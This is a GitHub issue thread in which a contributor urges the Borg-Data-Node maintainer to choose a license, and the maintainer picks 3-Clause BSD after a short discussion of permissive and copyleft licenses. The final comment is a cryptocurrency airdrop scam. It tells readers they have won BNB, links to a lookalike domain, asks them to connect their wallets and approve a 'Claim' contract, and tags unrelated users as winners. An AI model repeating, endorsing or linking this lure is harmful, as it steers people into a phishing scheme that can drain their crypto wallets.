### ISSUE TITLE
Better add a license

### ISSUE THREAD

**Issue by rugk** [EthraZa/Borg-Data-Node#1]
Could you please [choose a](https://choosealicense.com/) [license](https://help.github.com/articles/open-source-licensing/) and [add it to your repo](https://help.github.com/articles/open-source-licensing/#where-does-the-license-live-on-my-repository)?

Because [this](https://github.com/EthraZa/Borg-Data-Node#license) does not mean anything, from a legal point of you. I am very sorry, but you as a dev have to pick a license, not the user using the software.
Actually you could express the "do whatever you want" with multiple licenses, e.g. [the unlicense](https://choosealicense.com/licenses/unlicense/). But note that it really allows anybody to do anything with the license, without credit, without anything.

**Comment by rugk** [comment]
BTW you could actually even multilicense stuff to release it under multiple licenses and allow users to choose one, but this just makes it even more complicated… 😃

**Comment by EthraZa** [comment]
Oh I'll, in the next commit with real working code, I just didn't choose one yet. If you have any recomendation, I'll take a look at it.
That is the first OSS project I start in a long long time, the last one was in the Sourceforge days, before github become a thing.

**Comment by EthraZa** [comment]
I guess I want a license that:
- let people use the software
- mention back to me (us?), if they fork it
- don't let people ask money, for others, for the use of this very software
- don't let people sue me if something goes wrong with the software usage and their backup, or any other reason
- let this software to be packaged and distributed within Linux distros

**Comment by EthraZa** [comment]
Own 35 minutes was my limit to read about licenses... guess I'm going with 3-Clause BSD and that's it

**Comment by rugk** [comment]
Yeah, difference between BSD and gpl is mostly permissive vs copyleft. GPL code must be distributed under the same license, so when integrated into other software that software must be free/libre software too.
In permissive licenses, software code can be integrated into proprietary (not free) software, so the source code can be closed source.

**Comment by upccjesse** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @penghaotom, @FredericJacobs, @bheemaguli, @GajenderY, @prafaelo, @zdsppl, @ycq0125
